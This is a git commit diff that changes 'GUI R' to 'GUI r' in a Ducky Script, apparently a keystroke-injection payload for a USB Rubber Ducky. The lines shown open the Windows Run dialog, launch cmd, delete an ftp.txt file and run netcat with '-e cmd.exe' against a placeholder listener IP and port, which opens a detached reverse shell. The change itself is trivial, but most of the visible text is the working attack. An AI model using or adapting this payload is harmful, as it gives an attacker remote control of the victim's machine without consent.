"GUI R" -> "GUI r"

This commit is contained in:
Tim Mattison 2014-07-22 16:22:30 -07:00
parent 08c066a31d
commit 66ba1bebdd
1 changed files with 3 additions and 3 deletions

View File

@ -7,7 +7,7 @@ This script will:
Fill in the required information where you see the brackets.
```c
DELAY 10000
GUI R
GUI r
DELAY 200
STRING cmd
ENTER
@ -41,12 +41,12 @@ ENTER
STRING del ftp.txt & exit
ENTER
DELAY 2000
GUI R
GUI r
DELAY 200
STRING nc.exe [LISTENER IP] [LISTENER PORT] -e cmd.exe -d
ENTER
DELAY 2000
GUI R
GUI r
DELAY 200
STRING cmd
ENTER